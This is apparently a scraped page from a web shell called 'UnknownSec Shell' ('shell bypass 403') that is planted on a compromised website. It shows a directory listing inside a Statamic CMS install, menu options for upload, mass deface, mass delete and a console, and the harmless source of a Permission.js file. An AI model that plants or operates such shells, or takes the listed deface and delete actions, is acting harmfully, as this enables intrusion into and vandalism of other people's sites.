shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
resources
/
js
/
components
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Permission.js
import Vue from 'vue'; class Permission { constructor(instance) { this.instance = instance; } all() { return this.instance.$store.state.statamic.config.user.permissions; } has(permission) { return this.all().includes(permission) || this.all().includes('super'); } } Object.defineProperties(Vue.prototype, { $permissions: { get() { return new Permission(this); } } });
© 2026 UnknownSec